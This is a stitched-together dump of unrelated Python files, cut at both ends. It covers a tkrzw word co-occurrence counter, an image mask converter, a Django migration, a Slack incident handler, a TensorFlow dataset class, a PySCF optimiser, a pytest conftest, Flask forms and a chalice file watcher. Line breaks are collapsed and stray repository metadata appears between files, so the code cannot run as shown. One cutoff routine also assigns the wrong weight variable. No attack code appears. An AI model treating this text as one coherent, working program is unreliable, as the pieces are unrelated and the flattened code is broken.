tkrzw.DBM() self.mem_word_count.Open("", True, dbm="BabyDBM").OrDie() self.mem_cooc_count = tkrzw.DBM() self.mem_cooc_count.Open("", True, dbm="BabyDBM").OrDie() self.num_documents = 0 self.num_sentences = 0 self.num_words = 0 self.num_words_since_cutoff = 0 self.start_time = time.time() def FeedDocument(self, document): words = self.MartializeWords(document) self.num_documents += 1 self.num_sentences += len(document) self.num_words += len(words) self.num_words_since_cutoff += len(words) uniq_word_pairs = set() for word_index, word_pair in enumerate(words): if word_pair in uniq_word_pairs: continue uniq_word_pairs.add(word_pair) word, sentence_index = word_pair cooc_word_index = max(word_index - WINDOW_SIZE, 0) max_word_index = min(word_index + WINDOW_SIZE, len(words) - 1) scores = {} while cooc_word_index <= max_word_index: cooc_word, cooc_sentence_index = words[cooc_word_index] if cooc_word != word: diff = abs(word_index - cooc_word_index) - 1 score = tkrzw_dict.COOC_BASE_SCORE * (SCORE_DECAY ** diff) if cooc_sentence_index != sentence_index: score *= SENTENCE_GAP_PENALTY scores[cooc_word] = max((scores.get(cooc_word) or 0), int(score)) cooc_word_index += 1 self.RegisterWords(word, scores) if self.num_words >= BATCH_MAX_WORDS: self.Dump() self.Start() elif self.num_words_since_cutoff >= BATCH_MAX_WORDS / BATCH_CUTOFF_FREQ: self.DoCutOff() def Finish(self, total_num_sentences): 
if self.num_words: self.Dump() self.mem_word_count = None self.mem_cooc_count = None word_count_paths = [] cooc_count_paths = [] for index in range(0, self.num_batches): word_count_path = "{}-word-count-{:08d}.tks".format(self.data_prefix, index) cooc_count_path = "{}-cooc-count-{:08d}.tks".format(self.data_prefix, index) if os.path.isfile(word_count_path): logger.info("Detected merging ID {}".format(index)) word_count_paths.append(word_count_path) cooc_count_paths.append(cooc_count_path) if len(word_count_paths) > 1: logger.info("Merging word count databases") src_word_count_paths = word_count_paths[:-1] dest_word_count_path = word_count_paths[-1] self.MergeDatabases(src_word_count_paths, dest_word_count_path) else: dest_word_count_path = word_count_paths[0] if len(cooc_count_paths) > 1: logger.info("Merging cooccurrence count databases") src_cooc_count_paths = cooc_count_paths[:-1] dest_cooc_count_path = cooc_count_paths[-1] self.MergeDatabases(src_cooc_count_paths, dest_cooc_count_path) else: dest_cooc_count_path = cooc_count_paths[0] word_count_path = tkrzw_dict.GetWordCountPath(self.data_prefix) cooc_count_path = tkrzw_dict.GetCoocCountPath(self.data_prefix) logger.info("Finishing {} batches: word_count_path={}, cooc_count_path={}".format( self.num_batches, word_count_path, cooc_count_path)) os.rename(dest_word_count_path, word_count_path) os.rename(dest_cooc_count_path, cooc_count_path) def MartializeWords(self, document): words = [] for i, doc_words in enumerate(document): for word in doc_words: words.append((word, i)) return words def RegisterWords(self, word, scores): self.mem_word_count.Increment(word) for score in scores.items(): pair_key = word + " " + score[0] self.mem_cooc_count.Increment(pair_key, score[1]) def Dump(self): logger.info("Batch {} aggregation done: elapsed_time={:.2f}s, RSS={:.2f}MB".format( self.num_batches + 1, time.time() - self.start_time, tkrzw.Utility.GetMemoryUsage() / 1024.0 / 1024)) logger.info( ("Batch {} dumping: documents={}, sentences={}, words={}," + " unique_words={}, unique_cooc={}").format( self.num_batches + 1, self.num_documents, self.num_sentences, self.num_words, self.mem_word_count.Count(), self.mem_cooc_count.Count())) start_time = time.time() fill_ratio = min(self.num_words / BATCH_MAX_WORDS, 1.0) dbm_cooc_count_path = "{}-cooc-count-{:08d}.tks".format(self.data_prefix, self.num_batches) dbm_cooc_count = tkrzw.DBM() dbm_cooc_count.Open( dbm_cooc_count_path, True, dbm="SkipDBM", truncate=True, insert_in_order=True, offset_width=5, step_unit=16, max_level=8).OrDie() logger.info("Batch {} cooc count dumping: dest={}".format( self.num_batches + 1, dbm_cooc_count_path)) dbm_cooc_count.Set("", self.num_sentences).OrDie() it = self.mem_cooc_count.MakeIterator() it.First() min_word_count = math.ceil(MIN_WORD_COUNT_IN_BATCH * fill_ratio) if MIN_WORD_COUNT_IN_BATCH >= 2: min_word_count = max(min_word_count, 2) min_count = math.ceil(tkrzw_dict.COOC_BASE_SCORE * MIN_COOC_COUNT_IN_BATCH * fill_ratio) cur_word = None cur_word_count = 0 cur_word_weight = 1.0 cooc_words = [] while True: record = it.Get() if not record: break word_pair = record[0].decode() count = struct.unpack(">q", record[1])[0] word, cooc_word = word_pair.split(" ") if cur_word != word: if cur_word and cooc_words: self.DumpCoocWords(cur_word, cooc_words, dbm_cooc_count) cur_word = word cur_word_count = struct.unpack(">q", self.mem_word_count.Get(cur_word))[0] cur_word_weight = 1.0 if tkrzw_dict.IsNumericWord(cur_word): cur_word_weight = tkrzw_dict.NUMERIC_WORD_WEIGHT elif 
tkrzw_dict.IsStopWord(self.language, cur_word): cur_word_weight = tkrzw_dict.STOP_WORD_WEIGHT cooc_words = [] if cur_word_count * cur_word_weight >= min_word_count: cooc_count = struct.unpack(">q", self.mem_word_count.Get(cooc_word))[0] cooc_weight = 1.0 if tkrzw_dict.IsNumericWord(cooc_word): cooc_weight = tkrzw_dict.NUMERIC_WORD_WEIGHT elif tkrzw_dict.IsStopWord(self.language, cooc_word): cooc_weight = tkrzw_dict.STOP_WORD_WEIGHT cooc_prob = cooc_count / self.num_sentences cooc_idf = min(math.log(cooc_prob) * -1, tkrzw_dict.MAX_IDF_WEIGHT) score = count * (cooc_idf ** tkrzw_dict.IDF_POWER) score *= cur_word_weight * cooc_weight if (cooc_count * cooc_weight >= min_word_count and count * cur_word_weight * cooc_weight >= min_count): cooc_words.append((cooc_word, count, score)) it.Remove() if cur_word and cooc_words: self.DumpCoocWords(cur_word, cooc_words, dbm_cooc_count) dbm_cooc_count.Close().OrDie() dbm_word_count_path = "{}-word-count-{:08d}.tks".format(self.data_prefix, self.num_batches) dbm_word_count = tkrzw.DBM() dbm_word_count.Open( dbm_word_count_path, True, dbm="SkipDBM", truncate=True, insert_in_order=True, offset_width=4, step_unit=4, max_level=12).OrDie() logger.info("Batch {} word count dumping: dest={}".format( self.num_batches + 1, dbm_word_count_path)) dbm_word_count.Set("", self.num_sentences).OrDie() it = self.mem_word_count.MakeIterator() it.First() while True: record = it.Get() if not record: break word = record[0] count = struct.unpack(">q", record[1])[0] if count >= min_word_count: dbm_word_count.Set(word, count).OrDie() it.Remove() dbm_word_count.Close().OrDie() logger.info("Dumping done: elapsed_time={:.2f}s".format(time.time() - start_time)) self.num_batches += 1 merge_db_unit = 1 while self.num_batches % (merge_db_unit * MERGE_DB_UNIT) == 0: merge_db_unit *= MERGE_DB_UNIT self.ReduceDatabases(merge_db_unit) self.num_words_since_cutoff = 0 def DumpCoocWords(self, word, cooc_words, dbm_cooc_count): top_cooc_words = sorted( cooc_words, key=operator.itemgetter(2), reverse=True)[:MAX_COOC_PER_WORD] records = [] for cooc_word, count, score in top_cooc_words: pair_key = (word + " " + cooc_word).encode() records.append((pair_key, int(count))) for pair_key, count in sorted(records): dbm_cooc_count.Set(pair_key, count).OrDie() def DoCutOff(self): start_time = time.time() logger.info( ("Batch {} cutoff: documents={}, sentences={}, words={}," + " unique_words={}, unique_cooc={}").format( self.num_batches + 1, self.num_documents, self.num_sentences, self.num_words, self.mem_word_count.Count(), self.mem_cooc_count.Count())) it = self.mem_cooc_count.MakeIterator() it.First() min_count = math.ceil(tkrzw_dict.COOC_BASE_SCORE * MIN_COOC_COUNT_IN_BATCH / BATCH_CUTOFF_FREQ) cur_word = None cur_word_weight = 1.0 while True: record = it.Get() if not record: break word_pair = record[0].decode() count = struct.unpack(">q", record[1])[0] word, cooc_word = word_pair.split(" ") if cur_word != word: cur_word = word cur_word_weight = 1.0 if tkrzw_dict.IsNumericWord(cur_word): cur_word_weight = tkrzw_dict.NUMERIC_WORD_WEIGHT elif tkrzw_dict.IsStopWord(self.language, cur_word): cur_word_weight = tkrzw_dict.STOP_WORD_WEIGHT cooc_word_weight = 1.0 if tkrzw_dict.IsNumericWord(cooc_word): cur_word_weight = tkrzw_dict.NUMERIC_WORD_WEIGHT elif tkrzw_dict.IsStopWord(self.language, cooc_word): cur_word_weight = tkrzw_dict.STOP_WORD_WEIGHT if count * cur_word_weight * cooc_word_weight < min_count: it.Remove() else: it.Next() logger.info("Cutoff done: elapsed_time={:.2f}s, unique_cooc={}".format( 
time.time() - start_time, self.mem_cooc_count.Count())) self.num_words_since_cutoff = 0 def ReduceDatabases(self, merge_db_unit): step = int(merge_db_unit / MERGE_DB_UNIT) index = self.num_batches - merge_db_unit + step - 1 dest_index = self.num_batches - 1 src_word_count_paths = [] src_cooc_count_paths = [] while index < dest_index: logger.info("Detected merging source ID {}".format(index)) src_word_count_paths.append("{}-word-count-{:08d}.tks".format(self.data_prefix, index)) src_cooc_count_paths.append("{}-cooc-count-{:08d}.tks".format(self.data_prefix, index)) index += step dest_word_count_path = "{}-word-count-{:08d}.tks".format(self.data_prefix, dest_index) dest_cooc_count_path = "{}-cooc-count-{:08d}.tks".format(self.data_prefix, dest_index) logger.info("Merging word count DBM files to {}".format(dest_word_count_path)) start_time = time.time() self.MergeDatabases(src_word_count_paths, dest_word_count_path) logger.info("Merging done: elapsed_time={:.2f}s".format(time.time() - start_time)) logger.info("Merging cooccurrence count DBM files to {}".format(dest_cooc_count_path)) start_time = time.time() self.MergeDatabases(src_cooc_count_paths, dest_cooc_count_path) logger.info("Merging done: elapsed_time={:.2f}s".format(time.time() - start_time)) def MergeDatabases(self, src_paths, dest_path): dbm = tkrzw.DBM() dbm.Open(dest_path, True, dbm="SkipDBM").OrDie() merge_expr = ':'.join(src_paths) dbm.Synchronize(False, merge=merge_expr, reducer="total").OrDie() dbm.Close().OrDie() for src_path in src_paths: os.remove(src_path) def main(): args = sys.argv[1:] data_prefix = tkrzw_dict.GetCommandFlag(args, "--data_prefix", 1) or "result" language = tkrzw_dict.GetCommandFlag(args, "--language", 1) or "en" if tkrzw_dict.GetCommandFlag(args, "--quiet", 0): logger.setLevel(logging.ERROR) if args: raise RuntimeError("unknown arguments: {}".format(str(args))) WordCountBatch(data_prefix, language).Run() if __name__=="__main__": main() Charles-Lu/Labelme-to-Binary-PNG-Mask import glob import os import random import json # from shapely import geometry import PIL.ImageDraw as ImageDraw import PIL.Image as Image import math # save mask in "8_bit_binary" or "1_bit_binary", # 8-bit mode has better compatibility in general mode = "8_bit_binary" in_dir = "image" out_dir = "mask" mask_list = {"rune_success", "rune_shoot", "rune_target", "rune_center", "rune_blank"} # set of label names # create output directories if not os.path.exists(out_dir): os.makedirs(out_dir) for name in mask_list: new_dir = os.path.join(out_dir, name) if not os.path.exists(new_dir): os.makedirs(new_dir) # set image mode if mode == "1_bit_binary": pil_mode = "1" pil_fill = 1 elif mode == "8_bit_binary": pil_mode = "L" pil_fill = 255 else: raise Exception("Illegal image mode!") # begin mask generation for file in glob.glob(os.path.join(in_dir, "*.png")): im = Image.open(file) width, height = im.size # Find png and corresponding json file by name (splitext drops the extension; str.strip would remove matching characters, not the suffix) general_path = os.path.splitext(file)[0] general_name = os.path.basename(general_path) json_path = general_path + ".json" json_data = open(json_path).read() data = json.loads(json_data) shapes = data["shapes"] masks = {} for shape in shapes: label = shape["label"] points = shape["points"] shape_type = shape["shape_type"] # create new mask if the class appears for the first time if label not in masks: masks[label] = Image.new(pil_mode, (width, height)) draw = ImageDraw.Draw(masks[label]) # TODO: Support more formats. 
Only support polygon and circle yet if shape_type == "polygon": p = [(p[0], p[1]) for p in points] draw.polygon(p, fill=pil_fill) elif shape_type == "circle": center = points[0] another = points[1] radius = math.hypot(another[0] - center[0], another[1] - center[1]) draw.ellipse((center[0] - radius, center[1] - radius, center[0] + radius, center[1] + radius), fill=pil_fill) # create empty mask for absent label existed_mask = set(masks.keys()) absent_mask = mask_list.difference(existed_mask) for absent in absent_mask: masks[absent] = Image.new(pil_mode, (width, height)) # save all masks to file for label, mask in masks.items(): mask_name = "_".join([general_name, label]) mask_path = os.path.join(out_dir, label, mask_name) mask.save(mask_path + ".png", "PNG") # -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2016-11-01 12:50 from __future__ import unicode_literals from django.db import migrations, models import entries.models class Migration(migrations.Migration): dependencies = [ ('entries', '0003_auto_20161031_2323'), ] operations = [ migrations.AlterField( model_name='entry', name='extra', field=entries.models.JSONField(blank=True, default=''), ), migrations.AlterField( model_name='entry', name='what', field=models.CharField(max_length=200), ), ] # Copyright European Organization for Nuclear Research (CERN) # # Licensed under the Apache License, Version 2.0 (the "License"); # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Authors: # - , <>, 2013 # - , <>, 2017 import datetime import json import time import uuid from nose.tools import assert_equal from paste.fixture import TestApp from rucio.web.rest.trace import APP as trace_app class TestTrace(object): @staticmethod def test_submit_trace(): """ TRACE (REST): submit a trace via POST """ mwl = [] payload = json.dumps({'uuid': str(uuid.uuid4()), # not JSON serialisable 'string': 'deadbeef', 'hex': 0xDEADBEEF, 'int': 3, 'float': 3.14, 'long': 314314314314314314L, 'timestamp': time.time(), 'datetime_str': str(datetime.datetime.utcnow()), # not JSON serialisable 'boolean': True}) ret = TestApp(trace_app.wsgifunc(*mwl)).post('/', params=payload, headers={'Content-Type': 'application/octet-stream'}) assert_equal(ret.status, 201) """ Target Options """ from __future__ import print_function, division, absolute_import from .. import config class TargetOptions(object): OPTIONS = {} def __init__(self): self.values = {} def from_dict(self, dic): for k, v in dic.items(): try: ctor = self.OPTIONS[k] except KeyError: fmt = "%r does not support option: '%s'" raise KeyError(fmt % (self.__class__, k)) else: self.values[k] = ctor(v) @classmethod def parse_as_flags(cls, flags, options): opt = cls() opt.from_dict(options) opt.set_flags(flags) return flags def set_flags(self, flags): """ Provide default flags setting logic. Subclass can override. 
""" kws = self.values.copy() if kws.pop('nopython', False) == False: flags.set("enable_pyobject") if kws.pop("forceobj", False): flags.set("force_pyobject") if kws.pop('looplift', True): flags.set("enable_looplift") if kws.pop('boundcheck', False): flags.set("boundcheck") if kws.pop('_nrt', True): flags.set("nrt") if kws.pop('debug', config.DEBUGINFO_DEFAULT): flags.set("debuginfo") flags.set("boundcheck") if kws.pop('nogil', False): flags.set("release_gil") if kws.pop('no_rewrites', False): flags.set('no_rewrites') if kws.pop('no_cpython_wrapper', False): flags.set('no_cpython_wrapper') if 'parallel' in kws: flags.set('auto_parallel', kws.pop('parallel')) if 'fastmath' in kws: flags.set('fastmath', kws.pop('fastmath')) if 'error_model' in kws: flags.set('error_model', kws.pop('error_model')) if 'inline' in kws: flags.set('inline', kws.pop('inline')) flags.set("enable_pyobject_looplift") if kws: # Unread options? raise NameError("Unrecognized options: %s" % kws.keys()) 1000+ import logging import after_response from response.core.models.incident import Incident from response.slack.models.comms_channel import CommsChannel logger = logging.getLogger(__name__) SLACK_ACTION_MAPPINGS = {} class ActionContext: def __init__(self, incident, user_id, message, value, trigger_id, response_url): self.incident = incident self.user_id = user_id self.message = message self.value = value self.trigger_id = trigger_id self.response_url = response_url def action_handler(callback_id, func=None): def _wrapper(fn): SLACK_ACTION_MAPPINGS[callback_id] = fn return fn if func: return _wrapper(func) return _wrapper def remove_action_handler(callback_id): SLACK_ACTION_MAPPINGS.pop(callback_id, None) @after_response.enable def handle_action(payload): actions = payload["actions"] if actions: action = actions[0] action_id = action["action_id"] if action_id not in SLACK_ACTION_MAPPINGS: logger.error(f"Can't find handler for action id {action_id}") return handler = SLACK_ACTION_MAPPINGS[action_id] user_id = payload["user"]["id"] channel_id = payload["channel"]["id"] message = payload["message"] trigger_id = payload["trigger_id"] response_url = payload["response_url"] action_type = action["type"] if action_type == "button": value = action["value"] elif action_type == "static_select": value = action["selected_option"]["value"] else: logger.error(f"Can't handle action with type {action_type}") return # we want to tie all actions to an incident, and have two ways to do this: # - if action comes from a comms channel, lookup the incident by comms channel id # - if not in comms channel, we rely on the button value containing the incident id try: comms_channel = CommsChannel.objects.get(channel_id=channel_id) incident = comms_channel.incident except CommsChannel.DoesNotExist: incident_id = value incident = Incident.objects.get(pk=incident_id) except Incident.DoesNotExist: logger.error( f"Can't find incident associated with channel {channel_id} or with id {incident_id}" ) return action_context = ActionContext( incident=incident, user_id=user_id, message=message, value=value, trigger_id=trigger_id, response_url=response_url, ) handler(action_context) 0 from __future__ import division from __future__ import print_function from __future__ import absolute_import import numpy as np import tensorflow as tf import collections from ..utils import to_dtype __all__ = ['Dataset', 'Datasets', 'ImageDataset'] Datasets = collections.namedtuple('Datasets', ['train', 'validation', 'test']) class Dataset(object): @property def data(self): return 
self._data @property def shape(self): return self._data.shape[1:] @property def labels(self): return self._labels @property def num_examples(self): return self._num_examples @property def epochs_completed(self): return self._epochs_completed def __init__(self, data, labels): self._num_examples = data.shape[0] self._data = data self._labels = labels self._epochs_completed = 0 self._index_in_epoch = 0 def next_batch(self, batch_size, shuffle=True): """Return the next `batch_size` examples from this data set. Parameters ---------- batch_size: int The batch size. shuffle: bool Whether to shuffle the data at the beginning of each epoch. """ start = self._index_in_epoch self._index_in_epoch += batch_size if self._index_in_epoch > self._num_examples: if start < self._num_examples: self._index_in_epoch = self._num_examples else: # Finished epoch self._epochs_completed += 1 if shuffle or shuffle == 'batch': self._shuffle(batch_size, shuffle) # Start next epoch start = 0 self._index_in_epoch = batch_size assert batch_size <= self._num_examples end = self._index_in_epoch return self._data[start:end], self._labels[start:end] def _shuffle(self, batch_size, shuffle=True): # Shuffle the data if shuffle == 'batch': perm = self._batch_shuffle(batch_size) else: perm = np.arange(self._num_examples) np.random.shuffle(perm) self._data = self._data[perm] self._labels = self._labels[perm] def _batch_shuffle(self, batch_size): """This shuffles the array in a batch-wise fashion. Useful for shuffling HDF5 arrays (where one cannot access arbitrary indices). """ index_array = np.arange(self._num_examples) batch_count = int(len(index_array) / batch_size) # to reshape we need to be cleanly divisible by batch size # we stash extra items and re-append them after shuffling last_batch = index_array[batch_count * batch_size:] index_array = index_array[:batch_count * batch_size] index_array = index_array.reshape((batch_count, batch_size)) np.random.shuffle(index_array) index_array = index_array.flatten() return np.append(index_array, last_batch) class ImageDataset(Dataset): def __init__(self, data, labels, dtype='float32', reshape=True, preprocess=None): dtype = to_dtype(dtype).base_dtype if dtype not in (tf.uint8, tf.float32): raise TypeError('Invalid image dtype %r, expected uint8 or float32' % dtype) assert data.shape[0] == labels.shape[0], ( 'images.shape: %s labels.shape: %s' % (data.shape, labels.shape)) # Convert shape from [num examples, rows, columns, depth] # to [num examples, rows*columns*depth] if reshape: data = data.reshape(data.shape[0], np.prod(data.shape[1:])) if dtype == tf.float32: # Convert from [0, 255] -> [0.0, 1.0]. data = data.astype(np.float32) data = np.multiply(data, 1.0 / 255.0) super(ImageDataset, self).__init__(data, labels) server/trash_counter/__init__.py import typing import numpy as np from .segmentation import NormalBackground from .detect import ConnectedComponentBoundingBox from .classifier import ClassifyWithDeepNetFeatures import PIL import os import uuid class TrashCounter(object): """ Count trash in an image This class is responsible for detecting objects placed on top of a background, drawing bounding boxes that contain those objects, providing an initial classification for each object, and then returning a dictionary with the object count. 
""" def __init__(self, background=NormalBackground(), detector=ConnectedComponentBoundingBox(), classifier=ClassifyWithDeepNetFeatures()): self.background = background self.detector = detector self.classifier = classifier self.training_image_counter = 0 def create_chip(self, image, bbox): """ Make an image chip from the full image """ array = np.array(image) return PIL.Image.fromarray(array[bbox[0]:bbox[2], bbox[1]:bbox[3], :]) def make_data_image(self, fname, chip_directory="chips/"): """ Helper function to get features for training """ image = PIL.Image.open(fname).convert("RGB") self.background.update(image) background_mask = self.background.get_background_mask(image) foreground_mask = ~background_mask # ========== Group the foreground pixels into objects ================ bounding_boxes = self.detector.get_bounding_boxes(foreground_mask) # =========== Create a data set ======================= feature_set = [] for bbox in bounding_boxes: chip = self.create_chip(image, bbox) chip.save(open(os.path.join(chip_directory, "image_{0}.png".format(self.training_image_counter)), "wb")) feature_set.append(self.classifier.get_features(image, bbox).flatten()) self.training_image_counter += 1 return feature_set def make_data(self, fname_list, chip_directory="chips/"): """ Function to processs images for training """ feature_set = None for fname in fname_list: new_features = self.make_data_image(fname, chip_directory) if feature_set is None: feature_set = new_features else: feature_set += new_features return feature_set def __call__(self, fname, image_dir="image_chips/"): """ Count the trash in the provided image """ os.makedirs(image_dir, exist_ok=True) # ========== Read the Image =========================================== image = PIL.Image.open(fname).convert("RGB") # ========== Identify foreground and background pixels ================ self.background.update(image) background_mask = self.background.get_background_mask(image) foreground_mask = ~background_mask # Save the foreground mask for debugging self.foreground_mask = foreground_mask # ========== Group the foreground pixels into objects ================ bounding_boxes = self.detector.get_bounding_boxes(foreground_mask) # Save the bounding boxes for debugging self.bounding_boxes = bounding_boxes # ===================== Classify the Objects ========================== classes = self.classifier.predict(image, bounding_boxes) self.classes = classes # =================== Return the Chips + Classes ====================== report = [] for bbox, label in zip(bounding_boxes, classes): fname = os.path.join(image_dir, uuid.uuid4().__str__()) + "_" + label + ".png" chip = self.create_chip(image, bbox) chip.save(open(fname, "wb")) report.append({"image_path":fname, "label":label}) return report import sys import argparse from pyscf import gto, scf from pyscf.geomopt import berny_solver # ----------------------- # Argument Parser # ----------------------- parser = argparse.ArgumentParser() parser.add_argument('--atomic-coords', help='atomic coordinates') parser.add_argument('--density-fit', help='density fitting method') parser.add_argument('--basis-set', help='basis set') parser.add_argument('--aux-basis-set', help='auxiliary basis set') parser.add_argument('--pseudo-potential', help='pseudo potential') parser.add_argument('--functional', help='dft functional') parser.add_argument('--charge', help='charge') parser.add_argument('--multiplicity', help='multiplicity') parser.add_argument('--k-points', help='k-points [3x1]') 
parser.add_argument('--lattice-vectors', help='lattice vectors [3x3]') parser.add_argument('--frozen-cores', help='number of frozen cores') results, remaining = parser.parse_known_args() atomic_coords = results.atomic_coords.replace('\\n', '\n') density_fit = results.density_fit.upper( ) if results.density_fit != 'undefined' else None basis_set = results.basis_set aux_basis_set = (results.aux_basis_set if results.aux_basis_set != 'undefined' else None) pseudo_potential = (results.pseudo_potential if results.pseudo_potential != 'undefined' else None) functional = results.functional charge = int(results.charge) if results.charge is not None else 0 multiplicity = int( results.multiplicity) if results.multiplicity is not None else 1 spin = (multiplicity - 1) / 2 num_frozen_cores = int( results.frozen_cores) if results.frozen_cores is not None else 0 sys.argv = [sys.argv[0]] # ----------------------- # PYSCF # ----------------------- mol = gto.M( atom=atomic_coords, basis=basis_set, spin=spin, charge=charge, verbose=4) mf = scf.UHF(mol) mf.conv_tol = 1e-4 mf.max_cycle = 100 if density_fit: mf = mf.density_fit() mf.with_df.auxbasis = aux_basis_set new_mol = berny_solver.optimize(mf, assert_convergence=True) print("New geometry (unit A)") for atom_index, atomic_coord in enumerate(new_mol.atom): print("{:4} {:s} {:18.12f} {:16.12f} {:16.12f}".format( atom_index, atomic_coord[0], atomic_coord[1][0], atomic_coord[1][1], atomic_coord[1][2])) #!/usr/bin/env python3 # -*- coding:utf-8 -*- import base64 import pytest import allure from py.xml import html from selenium import webdriver from config.conf import cm from common.readconfig import ini from utils.times import timestamp from utils.send_mail import send_report driver = None @pytest.fixture(scope='session', autouse=True) def drivers(request): global driver if driver is None: driver = webdriver.Chrome() driver.maximize_window() def fn(): driver.quit() request.addfinalizer(fn) return driver @pytest.hookimpl(hookwrapper=True) def pytest_runtest_makereport(item): """ 当测试失败的时候,自动截图,展示到html报告中 :param item: """ pytest_html = item.config.pluginmanager.getplugin('html') outcome = yield report = outcome.get_result() report.description = str(item.function.__doc__) extra = getattr(report, 'extra', []) if report.when == 'call' or report.when == "setup": xfail = hasattr(report, 'wasxfail') if (report.skipped and xfail) or (report.failed and not xfail): screen_img = _capture_screenshot() if screen_img: html = '
<div><img src="data:image/png;base64,%s" alt="screenshot"/></div>
' % screen_img extra.append(pytest_html.extras.html(html)) report.extra = extra def pytest_html_results_table_header(cells): cells.insert(1, html.th('用例名称')) cells.insert(2, html.th('Test_nodeid')) cells.pop(2) def pytest_html_results_table_row(report, cells): cells.insert(1, html.td(report.description)) cells.insert(2, html.td(report.nodeid)) cells.pop(2) def pytest_html_results_table_html(report, data): if report.passed: del data[:] data.append(html.div('通过的用例未捕获日志输出.', class_='empty log')) def pytest_html_report_title(report): report.title = "pytest示例项目测试报告" def pytest_configure(config): config._metadata.clear() config._metadata['测试项目'] = "测试百度官网搜索" config._metadata['测试地址'] = ini.url def pytest_html_results_summary(prefix, summary, postfix): # prefix.clear() # 清空summary中的内容 prefix.extend([html.p("所属部门: XX公司测试部")]) prefix.extend([html.p("测试执行人: 随风挥手")]) def pytest_terminal_summary(terminalreporter, exitstatus, config): """收集测试结果""" result = { "total": terminalreporter._numcollected, 'passed': len(terminalreporter.stats.get('passed', [])), 'failed': len(terminalreporter.stats.get('failed', [])), 'error': len(terminalreporter.stats.get('error', [])), 'skipped': len(terminalreporter.stats.get('skipped', [])), # terminalreporter._sessionstarttime 会话开始时间 'total times': timestamp() - terminalreporter._sessionstarttime } print(result) if result['failed'] or result['error']: send_report() def _capture_screenshot(): """截图保存为base64""" now_time, screen_file = cm.screen_path driver.save_screenshot(screen_file) allure.attach.file(screen_file, "失败截图{}".format(now_time), allure.attachment_type.PNG) with open(screen_file, 'rb') as f: imagebase64 = base64.b64encode(f.read()) return imagebase64.decode() from day2 import parse_instructions, run_program import unittest class Day1TestCase(unittest.TestCase): def test_parse_instructions(self): self.assertEqual([1, 0, 0, 0, 99], parse_instructions("1,0,0,0,99")) self.assertEqual([2, 3, 0, 3, 99], parse_instructions("2,3,0,3,99")) self.assertEqual([2, 4, 4, 5, 99, 0], parse_instructions("2,4,4,5,99,0")) self.assertEqual( [1, 1, 1, 4, 99, 5, 6, 0, 99], parse_instructions("1,1,1,4,99,5,6,0,99") ) def test_run_program_1(self): instructions = [1, 0, 0, 0, 99] expected = [2, 0, 0, 0, 99] self.assertEqual(expected, run_program(instructions)) def test_run_program_2(self): instructions = [2, 3, 0, 3, 99] expected = [2, 3, 0, 6, 99] self.assertEqual(expected, run_program(instructions)) def test_run_program_3(self): instructions = [2, 4, 4, 5, 99, 0] expected = [2, 4, 4, 5, 99, 9801] self.assertEqual(expected, run_program(instructions)) def test_run_program_4(self): instructions = [1, 1, 1, 4, 99, 5, 6, 0, 99] expected = [30, 1, 1, 4, 2, 5, 6, 0, 99] self.assertEqual(expected, run_program(instructions)) def test_run_program_5(self): instructions = [1, 9, 10, 3, 2, 3, 11, 0, 99, 30, 40, 50] expected = [3500, 9, 10, 70, 2, 3, 11, 0, 99, 30, 40, 50] self.assertEqual(expected, run_program(instructions)) # Copyright (C) 2021-2022 Intel Corporation # SPDX-License-Identifier: Apache-2.0 # """ This module contains utility functions for use in defining ui rules """ from typing import Union from ote_sdk.configuration.ui_rules.types import Action, Operator def attr_convert_operator(operator: Union[str, Operator]) -> Operator: """ This function converts an input operator to the correct instance of the Operator Enum. It is used when loading an Rule element from a yaml file. 
""" if isinstance(operator, str): return Operator[operator] return operator def attr_convert_action(action: Union[str, Action]) -> Action: """ This function converts an input action to the correct instance of the Action Enum. It is used when loading an Rule element from a yaml file. """ if isinstance(action, str): return Action[action] return action from flask_wtf import FlaskForm from wtforms import StringField, SubmitField from wtforms.validators import ValidationError, DataRequired, Email, Length class SignupForm(FlaskForm): email = StringField(('Email'), validators=[Email(), DataRequired()]) submit = SubmitField('Sign Up') class LoginForm(FlaskForm): email = StringField('Email', validators=[Length(min=6), Email(message='Enter a valid email'), DataRequired()]) submit = SubmitField('Log In') 10-100 import logging import threading import time from typing import Callable, Dict, Optional, Iterator # noqa from chalice.cli.filewatch import FileWatcher, WorkerProcess from chalice.utils import OSUtils LOGGER = logging.getLogger(__name__) class StatWorkerProcess(WorkerProcess): def _start_file_watcher(self, project_dir): # type: (str) -> None watcher = StatFileWatcher() watcher.watch_for_file_changes(project_dir, self._on_file_change) def _on_file_change(self): # type: () -> None self._restart_event.set() class StatFileWatcher(FileWatcher): POLL_INTERVAL = 1 def __init__(self, osutils=None): # type: (Optional[OSUtils]) -> None self._mtime_cache = {} # type: Dict[str, int] self._shutdown_event = threading.Event() self._thread = None # type: Optional[threading.Thread] if osutils is None: osutils = OSUtils() self._osutils = osutils def watch_for_file_changes(self, root_dir, callback): # type: (str, Callable[[], None]) -> None t = threading.Thread(target=self.poll_for_changes_until_shutdown, args=(root_dir, callback)) t.daemon = True t.start() self._thread = t LOGGER.debug("Stat file watching: %s, with callback: %s", root_dir, callback) def poll_for_changes_until_shutdown(self, root_dir, callback): # type: (str, Callable[[], None]) -> None self._seed_mtime_cache(root_dir) while not self._shutdown_event.isSet(): self._single_pass_poll(root_dir, callback) time.sleep(self.POLL_INTERVAL) def _seed_mtime_cache(self, root_dir): # type: (str) -> None for rootdir, _, filenames in self._osutils.walk(root_dir): for filename in filenames: path = self._osutils.joinpath(rootdir, filename) self._mtime_cache[path] = self._osutils.mtime(path) def _single_pass_poll(self, root_dir, callback): # type: (str, Callable[[], None]) -> None new_mtimes = {} # type: Dict[str, int] for path in self._recursive_walk_files(root_dir): if self._is_changed_file(path, new_mtimes): callback() return if new_mtimes != self._mtime_cache: # Files were removed. 
